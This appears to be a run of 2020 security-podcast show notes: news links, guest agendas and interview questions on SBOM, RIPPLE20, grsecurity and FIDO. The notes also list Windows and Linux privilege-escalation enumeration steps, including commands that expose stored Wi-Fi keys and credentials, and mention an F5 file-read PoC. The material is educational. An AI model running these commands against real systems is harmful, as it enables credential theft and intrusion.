https://fortune.com/2020/09/18/ransomware-police-investigating-hospital-cyber-attack-death/
Zerologon -
https://nakedsecurity.sophos.com/2020/09/17/zerologon-hacking-windows-servers-with-a-bunch-of-zeros/
Tweet mentioning not needing to reset passwords for access:
https://twitter.com/_dirkjan/status/1307662409436475392
https://twitter.com/MsftSecIntel/status/1308941504707063808?s=20
Linux malware (drovorub)
https://www.tripwire.com/state-of-security/featured/drovorub-malware/
https://exploit.kitploit.com/2020/09/tp-link-cloud-cameras-ncxxx-bonjour.html
https://www.infosecurity-magazine.com/news/former-pm-passport-phone-hacker/
https://threatpost.com/bluetooth-spoofing-bug-iot-devices/159291/
Published on: September 29, 2020
https://www.kitploit.com/2020/05/web-hackers-weapons-collection-of-cool.html
https://www.ehackingnews.com/2020/09/hackers-attack-gaming-industry-sell.html
https://www.secjuice.com/windows-10-penetration-testing-os/
Nice to see stories about using Win10 as a pentest platform.
Was always a PITA to update Kali or whatever. @secjuice
One reason I enjoyed Dave Kennedy’s ‘pentester framework’ --brbr
https://www.ehackingnews.com/2020/09/a-new-security-vulnerability-discovered.html
https://docs.microsoft.com/en-us/lifecycle/announcements/adobe-flash-end-of-support
https://kbondale.wordpress.com/2020/09/13/lets-flatten-five-agile-fallacies/
Speak more to the need for process improvement. Trying to embrace a new ‘agile’ methodology is bunk. Find inefficiencies, work to improve those, collect metrics to show improvements.
https://www.linkedin.com/pulse/intersection-change-management-project-paula-alsher/
Leads to an excellent segue into our book club.
By the book, https://brakesec.com/adkar - used books on Amazon going for less than $10 USD
Thursday 17, 2020 - 7pm Pacific
FEEDBACK: "Gotta say I’m really enjoying this book. It has my mind moving in so many directions - our team’s change initiatives and desires, the agency-level initiatives, other change leaders in our org and their tools/techniques and successes/failures."
https://securityscorecard.com/blog/the-cisos-guide-to-reporting-cybersecurity-to-the-board
This came up during a discussion on our Slack.
Published on: September 14, 2020
WWHF Class: (Ms. Berlin)
“Breaching the Cloud”
@dafthack
https://www.blackhillsinfosec.com/breaching-the-cloud-perimeter-w-beau-bullock/
https://wildwesthackinfest.com/wwhf-at-secure-wv/
IWCE 2020 panel:
“Being a thought leader”
ADKAR class
Book Club: 03 September 2020 7pm: https://smile.amazon.com/ADKAR-Change-Business-Government-Community/dp/1930885504/ref=sr_1_1?dchild=1&keywords=ADKAR&qid=1598543747&sr=8-1
TLS cert lifetime is now capped at 13 months (397 days):
https://www.bleepingcomputer.com/news/technology/you-have-two-days-left-to-purchase-2-year-tls-ssl-certificates/
Tesla and FBI prevented $1 million ransomware hack at Gigafactory Nevada
https://electrek.co/2020/08/27/tesla-fbi-prevent-ransomware-hack-gigafactory-nevada/
https://hackerone.com/reports/783877
https://www.reddit.com/r/netsec/comments/iifh3r/remote_code_execution_in_slack_desktop_apps/
Reserved Campsites for InfosecCampout 2021
MHH Feel Good Boxes
Trojan - “not my fault”
Segfaults and then injects DLLs
@seaseceast
Published on: August 31, 2020
Ms. Berlin: Tabletop D&D exercise
Blumira is hiring https://www.blumira.com/career/lead-backend-engineer/
Allan Friedman - Director of Cybersecurity Initiatives, NTIA, US Department of Commerce
NTIA.gov - National Telecommunications and Information Administration
https://www.ntia.gov/sbom SBOM guidance
Healthcare SBOM PoC - https://www.ntia.gov/files/ntia/publications/ntia_sbom_healthcare_poc_report_2019_1001.pdf
Allan’s talk at Bsides San Francisco: https://www.youtube.com/watch?v=9j1KYLfklMQ
Questions (more may be added during the show, depending on answers given)
What is NTIA?
What is SBOM?
Why do we need one? Is it poor communications between vendors?
Is there any difference between “Software transparency” and “Software bill of materials”?
How do you make an SBOM? What data formats make sharing easier? What does a company do with an SBOM?
Where in the development (hardware or software) would you be creating an SBOM?
You mention in your BSSF talk about ‘how detailed it should be’. Can you give us an example of a high level SBOM, versus a more detailed one? Does it become a risk/reward effort concerning detail?
IoT device creators are working with their 3rd parties, who are working with their 3rd parties. Someone at home with a webcam cannot easily ask for an SBOM, so how do we convince device makers to want to ask for them?
How do you get your 3rd party that is a multi-national corporation to supply you with the information you need to ?
As we saw with RIPPLE20, many companies don’t know what they have. How would SBOM help keep another RIPPLE20 from happening?
Rob Graham’s blog post highlighted that vulns like HeartBleed would not have been stopped.
How does this help us track potential vulns?
Sharing information
Best way to share information about IoT components?
Could an information sharing org (ISAC) track these more readily?
vendor assessments:
Vendor does not have an SBOM, any specific questions we might ask that will allow an org to get more resolution into a potential vendor?
Interesting feedback from NTIA’s RFC
Other SBOM types (CycloneDX, OpenBOM, FDA’s CBOM)
Companies are out there creating SBOM, other government agencies have SBOM implementations. How do we keep this from being the XKCD “927” issue? https://xkcd.com/927/
non-US implementations of SBOM?
How do we get our companies to implement these?
SBOM could easily be something that could give hackers a lot of information about your org and depending on the information contained, I could see why you might not want to get super specific… Thoughts?
What is a ‘Bill of Materials’?
“A bill of materials (BOM) is a comprehensive inventory of the raw materials, assemblies, subassemblies, parts and components, as well as the quantities of each, needed to manufacture a product. In a nutshell, it is the complete list of all the items that are required to build a product.”
SBOM - Definition
As of November 2019, an estimated 126 different platforms - https://www.postscapes.com/internet-of-things-platforms/
NTIA did an RFC on “promoting the sharing of Supply Chain Security Risk Information”
Secure and Trusted Communications Network Act of 2019 (Act) - Calling it “CBOM”
Other groups working on similar: FDA https://www.fda.gov/media/119933/download
SPDX: Linux Foundation: https://spdx.org/licenses/
https://github.com/CycloneDX/specification
https://www.fda.gov/medical-devices/digital-health/cybersecurity
Medical device IR Playbook: https://www.mitre.org/sites/default/files/publications/pr-18-1550-Medical-Device-Cybersecurity-Playbook.pdf
Companies are helping to get “CBOM” for devices:
“‘It can take anywhere from six months to a year for a new medical device to get its 510(k) clearance from the FDA,’ said MedCrypt CEO Mike Kijewski in a news release”
https://www.medicaldesignandoutsourcing.com/medcrypt-acquires-medisao-in-medtech-cybersecurity-deal/
SBOM doesn’t work in DevOps: https://cybersecurity.att.com/blogs/security-essentials/software-bill-of-materials-sbom-does-it-work-for-devsecops
Intoto software development: https://www.intotosystems.com/
510k process: https://www.drugwatch.com/fda/510k-clearance/
Published on: August 24, 2020
Ms. Berlin: Tabletop D&D exercise
Blumira is hiring https://www.blumira.com/career/lead-backend-engineer/
Allan Friedman - Director of Cybersecurity Initiatives, NTIA, US Department of Commerce
Published on: August 18, 2020
WISP.org donation page: https://wisporg.z2systems.com/np/clients/wisporg/donation.jsp
Mick Douglas (@bettersafetynet on Twitter)
Powercat: https://github.com/besimorhino/powercat
Netcat in a PowerShell environment
https://www.hackingarticles.in/powercat-a-powershell-netcat/
Defenses against powercat?
LolBins: https://www.cynet.com/blog/what-are-lolbins-and-how-do-attackers-use-them-in-fileless-attacks/
ElasticSearch bought Endgame; https://www.elastic.co/about/press/elastic-announces-intent-to-acquire-endgame
https://krebsonsecurity.com/2020/07/thinking-of-a-cybersecurity-career-read-this/
Twitter DM to @bettersafetynet:
Hey... I wanna talk about @hrbrmstr's tweet on the show tonight as well...
https://twitter.com/hrbrmstr/status/1287442304593276929
My thinking is if Cisco and others didn't try to intentionally downplay vulnerabilities by announcing them on a Friday, would we be more likely to patch sooner? Also, greater need for testing of patches to ensure that 80% of your workforce rely on that technology now. What's worse? Patching on a Friday evening (after several hours explaining the vuln to a manager), and then having it fuck something up so you're up at crack of dawn Monday troubleshooting something missed Friday night because testing was rushed/not conducted because the CEO can't access email?
I have thoughts, I've added this to the show note google doc.
https://www.reddit.com/r/netsec/comments/hwaj6f/nmap_script_fot_cve20203452/ -- nmap PoC script?
Embargoed vulns…
Getting management buy-in to patch
Published on: August 10, 2020
WISP.org PSA at 35m56s - 37m19s
Agenda:
Bio/background
Why are you here (topic discussion)
What is the Linux Security Summit North America
Questions from the meeting invite:
This only affects people who want to use a custom kernel, correct? This doesn’t affect you if you are running bog-standard Linux (Debian, Gentoo, Ubuntu), right?
What options do people have in cloud environments?
Does the use of microservices make grsecurity less worthwhile?
You mentioned ARM 64 processors in your first slide as making significant security functionality strides. With Apple and Microsoft going to ARM based processors, what are some things you feel need to be added to the kernel to shore up Linux for ARM, since some purists enjoy an Apple device with Linux on it?
https://www.youtube.com/watch?v=F_Kza6fdkSU - Youtube Video
https://grsecurity.net/10_years_of_linux_security.pdf - PDF slides
https://lwn.net/Articles/569635/ - Definition of KASLR
LTS kernels moved from 2 years to 6 years - why?
6 years is pretty much “FOREVER” in software development.
Patches get harder to backport, or worse;
Could introduce new vulnerabilities
Project Treble: https://www.computerworld.com/article/3306443/what-is-project-treble-android-upgrade-fix-explained.html
LTSI: https://ltsi.linuxfoundation.org/
4.4 XLTS is available until Feb 2022
Not all fixes have been backported (1,250 security fixes aren’t in the latest stable 4.4 kernel)
What are the “safe” kernels?
Has anything changed since the presentation you gave earlier in July 2020?
Syzkaller
Let’s discuss Slide 27 (what are those terms?)
“Is it improving code quality, or Is it making people lazier and more reliant on a tool to check code?”
Slide 29 audio, you mention that you use Syzkaller… why do you use it?
Exploitation Trends
Attackers still don’t care about whether a vulnerability has a CVE assigned or not
Don’t many vulnerabilities require some work to get to the kernel? And why should they work to get to the kernel?
500K IF the kernel vuln affects major distros (CentOS, Ubuntu)
https://resources.whitesourcesoftware.com/blog-whitesource/top-10-linux-kernel-vulnerabilities
Why does Zerodium payout for kernel vulns lower than application vulns? Would it be fair to say that getting root/persistence is all that matters and you don’t need to worry about the kernel to do so?
Many of the new security features are protecting against bad programming practices?
So by adding all these things, who are you securing systems against? Bad actors, or devs who employ poor coding measures?
Why do you think we see lower adoption rates of security
Problem solving:
Halvar Flake: http://addxorrol.blogspot.com/2020/03/before-you-ship-security-mitigation.html
If we have time…
Threat models in a kernel
Where do they go in the development lifecycle?
If kernel dev is an open environment, what precipitates the need for a kernel mitigation threat model
Is there an example somewhere that we can see? What is the format? Methodology?
Do you think static code analysis of the kernel is worthwhile at all?
Absolutely! We do a lot of it, including via the analysis resulting from compiling with LLVM, as well as via specific static analysis GCC plugins of our own.
OK, what about the large amount of false positives the analyzers generate? Do you get around with your custom plugins? Also, do you use the analyzers included with Clang and GCC v.10 or 3rd-party products?
That's usually a property of the analysis itself -- some can have large false positive issues, others not. Ideally we try to limit that for the plugins we write (we just recently added one helpful for some kind of NULL ptr dereferences this week). My understanding is the public now also has access to the Coverity reports for the kernel? As far as GCC versions, yes we test with all versions from 4.5 to 10.
What do you think of proposed XPFO patch? https://lwn.net/Articles/784839/
The performance profile is a big problem, and it doesn't address that the same attack can be performed in a different way that it wouldn't handle (that limitation is also mentioned in the original paper). So we haven't invested in it at all with our own work.
How about git SHA-256 security measures?
Not my domain of expertise, but sounds like a good idea.
What is the status of KASLR on non-Intel architectures? ARMv7/v8?
It exists there as well, and is shipped in Android. It's also recently been added for PowerPC.
What dynamic analysis/testing tools do you use for the kernel?
We have a couple racks of hardware, including some new AMD EPYC2 systems dedicated entirely to testing and syzkaller fuzzing. We have syzkaller in place (along with backports of functionality to improve its functionality/coverage) for all kernels we support, as well as a good mix of physical/VM systems for major distros, and automated build/boot/functionality/regression testing in a number of configs across ARM/ARM64/MIPS/PowerPC/SPARC64/i386/x86_64.
Thanks! Do you write your own configs/definitions for syzkaller?
Yes, including some changes to the code to have it detect some of our specific kernel messages (size_overflow, refcount, RAP, etc.)
What do you think about LKRG? Also, does grsec provide any similar runtime protection/detection/security?
I think it's a good alternative to some other commercial security products, but it's not what our goal is with grsecurity. I like the author of LKRG, but heuristic-based security is always problematic as you can't perform the checks everywhere they need to be performed, or as often as they need to be performed. When an attacker knows the checks performed (or has a general idea), then it's easy to devise an attack that would bypass it, knowing how computationally complex it would be to detect. So in grsecurity we focus on providing real defense vs just having a chance to detect something after the fact.
Do you plan on implementing RAP on PowerPC Architecture?
We haven't seen any commercial interest in it, but RAP is technically architecture-independent. We've done some demos for non-x86 architectures, and also just recently (within the past month or so), released a version for i386.
For how long GRSecurity is planning to support 5.4 LTS and LTS generally? What do you think is a good rule of thumb?
We've always generally supported them for 3 years, regardless of upstream's support periods. We have an independent process for performing backports that involves looking at all the upstream commits and other sources of information, regardless of any stable/Fixes tags (basically a manual version of AUTOSEL).
What is your opinion of the recently proposed Function-Granular KASLR series?
Not a fan of *KASLR in the kernel in general. It tries to deal with a problem (poorly) that there already exists a much better solution for: CFI.
Could you comment on how well (relative to your detailed x86 knowledge) ARM and PPC security fixes are backported?
We have many years of reverse engineering experience (15+ on my end) across multiple architectures. We were the first to develop software-based PXN/PAN for ARM, for instance. We've also developed functionality specifically for non-x86 architectures. Within the past 2 years or so, we added POWER9 support for REFCOUNT, and have the physical hardware on site (in addition to qemu-based testing) to perform the work. But yes, our backports cover all architectures we support.
What is your opinion on the use of BPF for security-purposes, i.e. security monitoring and newer approaches like KRSI? Enabling something like BPF solely for the use of security seems like it could backfire, given how invasive it is.
As long as it's not controllable by an unprivileged user, I think it's fine. Anything that avoids the hassle of having to upstream something in order to implement some new kind of security check, is a good idea. They'll still be limited by the LSM interface itself, so that would be the next barrier to go. With BTF, there's a lot of possibility there.
Regarding exploiting containers: isn't the issue with containers that they have very poor defaults and that people don't use the features they could? For example: mounting sysfs or procfs into a container or not adjusting seccomp/apparmor (or better(?) selinux) policies?
That's a problem, but the crucial problem is the shared kernel among all containers. If you look at past exploits, they've been in things like futex, mremap, waitid, brk, etc, all syscalls that would be allowed in nearly all of the most strict seccomp policies. The granularity of current seccomp policies is really not that great, and any sufficiently complex code will necessarily have exposure to a large part of kernel attack surface.
What do you think about the CIP Projects' focus on CVE tracking (especially for the kernel)?
It's a good initiative, but the main problem with the kernel is that most vulnerabilities in the kernel don't get a CVE in the first place. I know for certain that many of the security issues we've tweeted haven't had a CVE assigned. The ones that do are when a distro with the vuln present in their kernel spots it and requests one. Most vulnerabilities in recent kernels especially don't get CVEs requested, because distros aren't shipping them.
What's your opinion on SMACK? Any other reference implementation except Tizen?
Haven't used it myself, so no opinion one way or another, sorry. Doesn't seem bad at least in terms of number of security fixes backported to it compared to other access control LSMs.
If you disable as many CONFIG_* options in your kernel config have you actually reduced your attack surface or is most of the vulnerable code not in modules?
Yes, this is a good approach particularly for upstream kernels. I would definitely recommend compiling your own kernel instead of using default distro configs (from a security perspective).
Under grsecurity, we have a feature that makes it actually a good idea to put as much functionality in modules as possible, as they can't be auto-loaded by unprivileged users. So the functionality is there if it's needed across a fleet of systems, without the downsides.
Is TARA analysis performed on the Linux kernel?
I'm not familiar with this, sorry!
Is the poor state of LTS and XLTS security backports found in PPC and ARM as well as (presumably) what you report for x86?
It's somewhat of an across-the-board problem.
Actually, I hoped that you would talk about the new cool features that appeared in grsecurity. Can you share anything about your new kernel heap hardening?
It's called AUTOSLAB, and it's useful both for security (particularly against AEG and UAFs), but also for debugging. Minimal performance impact, we've had one person mention their system feels faster now, and we actually had a bug in one of our routine benchmarks where the feature got enabled in the "minimal" config, yet still reported better benchmark results in all tests than an upstream kernel. So a really nice performance profile, with some additional memory wastage in the MEMCG case, but nothing terrible. Also non-invasive, as it's done through a GCC plugin.
Thanks for your talk, Brad! What would make you work for upstream?
We offered that already years ago, and none of the companies involved seemed to be interested. So we're funded directly now by people that benefit from our work.
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonSmile: https://brakesec.com/smile
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://pandora.app.link/p9AvwdTpT3
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: July 31, 2020
Whitepaper: https://www.jsof-tech.com/ripple20/
[blog] Build your own custom TCP/IP stack: https://www.saminiir.com/lets-code-tcp-ip-stack-1-ethernet-arp/
Another custom TCP/IP stack: https://github.com/tass-belgium/picotcp
RIPPLE 20 Whitepaper: https://drive.google.com/file/d/1d3NNVCRPVFk0-V0HUO5CxWWVn9pYIvmF/view?usp=sharing
Agenda:
Part 1:
Background on the report
Why is it called RIPPLE20? What’s the RIPPLE about?
Communications with Treck (and its Japanese counterpart)
Were you surprised about the reaction? Positive or negative?
Types of systems affected?
IoT
Embedded systems
SCADA
What precipitated the research?
What difficulties did you face in finding these vulns? Deadlines?
What tools were used for analysis? (I think you mentioned Forescout --brbr)
What kind of extensibility are we talking about? TCP sizes?
What did JSOF gain by doing this?
What were the initial benefits of using the TCP/IP stack?
Speed? Size?
Do these vulns affect other TCP/IP stacks?
Did Treck give you access to source? Any specific requirements set by Treck? Any items that were off-limits?
Updates since the report was released?
Are your vulns such that they can be detected online?
Part 2:
Supply chain issues
What should companies do when they don’t know what’s in their own tech stack?
Software bill of materials: https://en.wikipedia.org/wiki/Software_bill_of_materials
PicoTCP link above does not release all code, because they use binary blobs that make proper code review next to impossible
“Unfortunately we can't release all the code, a.o. because some parts depend on code or binaries that aren't GPL compatible, some parts were developed under a commercial contract, and some consist of very rough proof-of-concept code. If you want to know more about the availability under the commercial license, or the possibility of using our expert services for porting or driver development, feel free to contact us at [email protected].”
Blobs: https://en.wikipedia.org/wiki/Proprietary_device_driver
Vendor Contact
How many organizations are affected by these vulnerabilities?
Are some devices and systems more vulnerable than others?
How many are you still investigating to see if they are affected?
What’s the initial email look like when you tell a company “you’re vulnerable to X”?
Who are you dealing with initially? What is your delivery when you’re routed to non-technical people?
How did you tailor your initial response when you learned of the position of the person?
Lessons Learned:
What would you have done differently next time?
Any additional tooling that you’d have used?
BlackHat talk: 05 August
What should companies do to reduce or mitigate the chances of the types of vulnerabilities found by your org?
https://www.supplychainservices.com/blog/major-security-risks-windows-embedded-users
Published on: July 24, 2020
Whitepaper: https://www.jsof-tech.com/ripple20/
[blog] Build your own custom TCP/IP stack: https://www.saminiir.com/lets-code-tcp-ip-stack-1-ethernet-arp/
Another custom TCP/IP stack: https://github.com/tass-belgium/picotcp
RIPPLE 20 Whitepaper: https://drive.google.com/file/d/1d3NNVCRPVFk0-V0HUO5CxWWVn9pYIvmF/view?usp=sharing
Agenda:
Part 1:
Background on the report
Why is it called RIPPLE20? What’s the RIPPLE about?
Communications with Treck (and its Japanese counterpart)
Were you surprised about the reaction? Positive or negative?
Types of systems affected?
IoT
Embedded systems
SCADA
What precipitated the research?
What difficulties did you face in finding these vulns? Deadlines?
What tools were used for analysis? (I think you mentioned Forescout --brbr)
What kind of extensibility are we talking about? TCP sizes?
What did JSOF gain by doing this?
What were the initial benefits of using the TCP/IP stack?
Speed? Size?
Do these vulns affect other TCP/IP stacks?
Did Treck give you access to source? Any specific requirements set by Treck? Any items that were off-limits?
Updates since the report was released?
Are your vulns such that they can be detected online?
Part 2:
Supply chain issues
What should companies do when they don’t know what’s in their own tech stack?
Software bill of materials: https://en.wikipedia.org/wiki/Software_bill_of_materials
PicoTCP link above does not release all code, because they use binary blobs that make proper code review next to impossible
“Unfortunately we can't release all the code, a.o. because some parts depend on code or binaries that aren't GPL compatible, some parts were developed under a commercial contract, and some consist of very rough proof-of-concept code. If you want to know more about the availability under the commercial license, or the possibility of using our expert services for porting or driver development, feel free to contact us at [email protected].”
Blobs: https://en.wikipedia.org/wiki/Proprietary_device_driver
Vendor Contact
How many organizations are affected by these vulnerabilities?
Are some devices and systems more vulnerable than others?
How many are you still investigating to see if they are affected?
What’s the initial email look like when you tell a company “you’re vulnerable to X”?
Who are you dealing with initially? What is your delivery when you’re routed to non-technical people?
How did you tailor your initial response when you learned of the position of the person?
Lessons Learned:
What would you have done differently next time?
Any additional tooling that you’d have used?
BlackHat talk: 05 August
What should companies do to reduce or mitigate the chances of the types of vulnerabilities found by your org?
https://www.supplychainservices.com/blog/major-security-risks-windows-embedded-users
Published on: July 16, 2020
1st: WISP.org PSA from Rachel Tobac (@racheltobac) & @wisporg talking about #shareTheMicInCyber
#SAML PAN-OS: https://twitter.com/RyanLNewington/status/1278074919092289537
F5 vulnerability:
https://www.wired.com/story/f5-big-ip-networking-vulnerability/
F5 Mitigation (if patching is not immediately possible): https://twitter.com/TeamAresSec/status/1280590730684256258
Redirect 404 /
https://twitter.com/wugeej/status/1280008779359125504 - Tweet with PoC for the LFI and RCE
F5 Big-IP CVE-2020-5902 LFI and RCE
LFI
https://
or /etc/hosts
or /config/bigip.license
RCE
https://
How to cope in a no-win situation:
https://twitter.com/datSecuritychic/status/1280527467569008640
Semicolon in bash: https://docstore.mik.ua/orelly/unix3/upt/ch28_16.htm#:~:text=When%20the%20shell%20sees%20a,once%20at%20a%20single%20prompt.
Published on: July 8, 2020
Thank you to Marcus Carey for his excellent guidance and leadership this week.
Cognizant breach: https://www.ehackingnews.com/2020/06/cognizant-reveals-employees-data.html
Maze ransomware write-up: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/
https://docs.paloaltonetworks.com/pan-os/9-0/pan-os-admin/authentication/authentication-types/saml
PAN-OS CVE 2020-2021 -
We have been made aware of a serious issue with SAML on Palo Alto Networks PAN-OS
We strongly encourage our customers to upgrade to one of the following versions:
PAN-OS 8.1.15
PAN-OS 9.0.9
PAN-OS 9.1.3 and greater
This is a critical vulnerability with the only mitigation being to either turn OFF SAML or to upgrade the PAN-OS.
A CVE will be released on Monday :: CVE-2020-2021
https://en.wikipedia.org/wiki/Security_Assertion_Markup_Language
https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/
https://gist.github.com/Cyb3rWard0g/a4a115fd3ab518a0e593525a379adee3
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4657
https://www.blumira.com/logmira-windows-logging-policies-for-better-threat-detection/
How would we map this against the MITRE matrix?
Are there any MITRE attack types that are so similar that one attack can be two different things in the matrix?
https://www.us-cert.gov/ics/advisories/icsa-20-168-01
Published on: June 24, 2020
James Nelson, VP of Infosec, Illumio
How has COVID-19 changed cybersecurity? Why is cyber resilience especially important now? What are the most important steps to ensure cyber-resiliency? How do you talk to business leaders about investing in cybersecurity to boost resiliency?
The best way for organizations to keep their ‘crown jewels’ secure is adopting a Zero Trust mindset. Organizations need to take advantage of adaptive security infrastructure that can scale to meet current and future organizational needs, and take steps to ensure even third-party hosted data is policy compliant.
Most CISOs don't talk to the board regularly, so they don't understand that this is the conversation the board wants to have. The security team's spokesperson needs a credible plan that shows how badly things could go. Showing how spending is directly connected to mitigating those risks is vital to getting the funding needed, as is showing why an increase in spend corresponds to a decrease in risk.
Cyber-Resilience:
https://en.wikipedia.org/wiki/Cyber_resilience
https://en.wikipedia.org/wiki/Business_continuity_planning#Resilience
Doug Barth and Evan Gilman - https://brakeingsecurity.com/2017-017-zero_trust_networking_with_doug_barth
part1 with Masha Sedova: https://traffic.libsyn.com/secure/brakeingsecurity/Masha_sedova-elevate_security-profiled-education-phishing-part1.mp3
Part2: https://traffic.libsyn.com/secure/brakeingsecurity/2020-019-masha_sedova-privacy-human_behavior-phishing-customized_training.mp3
https://www.helpnetsecurity.com/2017/08/24/assume-breach-world/
Key concepts:
Visibility into your environment
Controls necessary to repel attackers
Architecture of the network to create chokepoints (east/west, north/south isolation)
Threat modeling and regular threat assessment
Mechanisms to allow for rapid response
How long will current security controls hold a determined attacker at bay?
Business-wide Risk Management response can often determine resiliency in a Crisis/Breach situation.
Cyber-Resilience Framework (per NIST SP 800-160 Vol. 2: https://csrc.nist.gov/publications/detail/sp/800-160/vol-2/final)
What does “cyber resiliency” mean to the organization? To the department? To the individual? And to the mission or business process the system is intended to support?
Which cyber resiliency objectives are most important to a given stakeholder?
To what degree can each cyber resiliency objective be achieved?
How quickly and cost-effectively can each cyber resiliency objective be achieved?
With what degree of confidence or trust can each cyber resiliency objective be achieved?
(What do we as security people do to ensure that all of these are properly answered? --brbr)
Architecture of systems:
Depending on the age of our information systems and technology stacks, cruft builds up or one-off systems are set up and forgotten.
We (the infosec industry) talk about shifting security left in a DevOps environment to ensure security gets put in, but what should we do as an organization when we think about adding systems in terms of cyber-resilience? (It would seem that resilience may also be tied to the security or functionality in a piece of hardware and software. Proper understanding of all the system's capabilities/settings/options would be essential for drafting responses --brbr)
Some related and tangential suggestions for ideas/comments/themes/topics in case you feel like any fit into the conversation:
Published on: June 17, 2020
Andrew Shikiar, executive director and CMO of the (Fast IDentity Online) FIDO Alliance.
What is FIDO?
“open industry association launched in February 2013 whose mission is to develop and promote authentication standards that help reduce the world’s over-reliance on passwords. FIDO addresses the lack of interoperability among strong authentication devices and reduces the problems users face creating and remembering multiple usernames and passwords.”
Did any one event precipitate creation of the FIDO alliance?
UAF= https://fidoalliance.org/specs/fido-uaf-v1.2-rd-20171128/fido-uaf-protocol-v1.2-rd-20171128.html
U2F = https://en.wikipedia.org/wiki/Universal_2nd_Factor (yubikeys, tokens)
https://landing.google.com/advancedprotection/
FIDO supports biometrics - https://www.biometricupdate.com/202002/how-fido-based-biometric-technology-clears-up-the-iot-authentication-mess
FIDO certified software and companies: https://fidoalliance.org/fido-certified-showcase/
IBM: https://www.ibm.com/blogs/sweeden/fido2-conformance-why-its-a-big-deal/ --
Digital Identity Guidelines: Authentication and Lifecycle Management - digital ID framework
NIST guidelines that FIDO meets: https://pages.nist.gov/800-63-3/sp800-63b.html#sec5
https://fidoalliance.org/certification/authenticator-certification-levels/
https://github.com/herrjemand/awesome-webauthn
https://fidoalliance.org/content/case-study/
https://loginwithfido.com/provider/
From a threat modeling perspective, how does ‘2fa’ occur when the authenticating method and the browser are on the same device?
Consumer education initiative https://loginwithfido.com/
IoT Devices- https://fidoalliance.org/internet-of-things/
https://blog.techdesign.com/fido-authentication-to-secure-iot-devices/
For Developers: https://fidoalliance.org/developers/ or https://webauthn.io/ - dev information about WebAuthN
https://github.com/herrjemand/awesome-webauthn
https://fidoalliance.org/events/ - upcoming webinars for FIDO related topics
NTT DOCOMO introduces passwordless authentication for d ACCOUNT
https://groups.google.com/a/fidoalliance.org/forum/#!forum/fido-dev
Published on: June 10, 2020
**If Derek told you about us at SANS, send a DM to @brakeSec or email [email protected] for an invite to our slack**
OSCP/HtB/VulnHub is a game... designed to have a tester find a specific nugget of information to pivot or gain access to greater power on the system.
Far different in the 'real' world.
Privilege escalation in Windows:
*as of June 2020, many of these items still work, may not work completely in the future*
*even so, many of these may not work if other mitigating controls are in place*
PENTEST METHODOLOGY:
PTES - http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines
OSSTMM - https://www.isecom.org/OSSTMM.3.pdf
Redteam methodology: https://www.synopsys.com/glossary/what-is-red-teaming.html
https://www.fuzzysecurity.com/tutorials/16.html
https://medium.com/@Shorty420/enumerating-ad-98e0821c4c78
Enumerate the machine
Services
Network connections
Users
Logins
Domains
Files
Software installed (putty, git, MSO, etc) *older software may install with improper permissions*
Service paths (along with the users the services run as)
Windows Features (WSL, SSH, etc)
Patch level (Build 1703, etc)
Wifi networks and passwords (netsh wlan show profile <SSID> key=clear)
Powershell history
Bash History (if WSL is used)
Incognito tokens
Stored credentials (cmdkey /list)
Powershell transcripts (search text files for "Windows PowerShell transcript start")
Context for the above: understand how the users make use of the system and how they connect to other systems, then follow those paths to find lateral movement, misconfigurations, etc. Each new system or user will provide further information to loot or avenues to explore.
Linux EoP:
https://guif.re/linuxeop
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Enumeration
Mostly the same as above
Bash history or profile files
Writable scripts (tampering with paths or environment variables)
Setuid/Setgid binaries
Sticky bit directories
Crontabs
Email spools
World writable/readable files
.ssh config files (keys, active sessions)
Tmux/screen sessions
Application secrets (database files, web files with database connectivity, hard coded creds or keys, etc)
VPN profiles
GNOME keyrings - https://askubuntu.com/questions/96798/where-does-seahorse-gnome-keyring-store-its-keyrings
Ways to defend against those kinds of EoP.
Something cool: https://www.youtube.com/playlist?playnext=1&list=PLnxNbFdr_l6sO6vR6Vx8sAJZKpgKtWaGX&feature=gws_kp_artist -- high Rollers
Derek is speaking at SANS SUMMIT happening on 04-05 June (FREE!) - https://www.sans.org/event/hackfest-ranges-summit-2020
Ms. Berlin is speaking at EDUCAUSE - VIRTUAL (04 June) https://www.educause.edu/
Published on: May 27, 2020
Masha Sedova - Founder, Elevate Security
Topic ideas from the PR company:
The secret is, security teams have installed tons of security tooling that can give insights into how our employees are behaving. But we just leave this data on the cutting room floor. Masha Sedova can talk about where to find this goldmine of data and what security teams can do to leverage this newfound knowledge.
Technology like vuln scanners or something more?
Motivation Theory (Deming): https://en.wikipedia.org/wiki/W._Edwards_Deming#Key_principles
X&Y: https://en.wikipedia.org/wiki/Theory_X_and_Theory_Y
Ouchi Z theory https://en.wikipedia.org/wiki/Theory_Z_of_Ouchi
Masha’s suggested topics:
Why do security teams have difficulty in understanding their human risk today? What are the blockers?
What should security teams be measuring to get a holistic view of human risk?
What's the difference between security culture, security behavior change, and security awareness?
Is security culture a core capability in security defense? Why or why not?
Quantifying risk…
Is investing in human training a waste of time?
Phishing - mock phish or real phishing
Pull data to see who is clicking on links
Send an ‘intervention’
Gotta move away from training
The ‘security team’ will save them…
https://www.ncsc.gov.uk/guidance/phishing
Books:
https://www.amazon.com/Nudge-Improving-Decisions-Health-Happiness/dp/014311526X
Reality broken: https://www.amazon.com/Reality-Broken-Games-Better-Change/dp/0143120611
